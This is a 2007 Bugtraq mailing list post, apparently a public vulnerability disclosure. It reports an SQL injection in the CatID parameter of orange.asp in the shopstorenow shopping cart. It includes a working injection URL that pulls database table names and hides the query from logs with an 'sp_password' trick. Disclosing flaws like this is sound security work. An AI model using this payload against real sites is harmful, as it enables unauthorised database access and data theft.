Bugtraq mailing list archives
shopstorenow (orange.asp) sql injection
From: emel_gw_ini () yahoo com
Date: 6 Jan 2007 17:19:37 -0000
============================= HItamputih Crew ==================== #hitamputih Advisory ##Discovered By : IbnuSina #----------------------------------------------------------- #Software: shopstorenow E-commerce Shopping Cart #Method: SQL Injection # [[SQL]]]--------------------------------------------------------- http://[target]/[path]//orange.asp?CatID=[SQL] ================================================ ex: http://[target]/[path]//orange.asp?CatID=1'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password #########################################################################################
Current thread:
- shopstorenow (orange.asp) sql injection emel_gw_ini (Jan 06)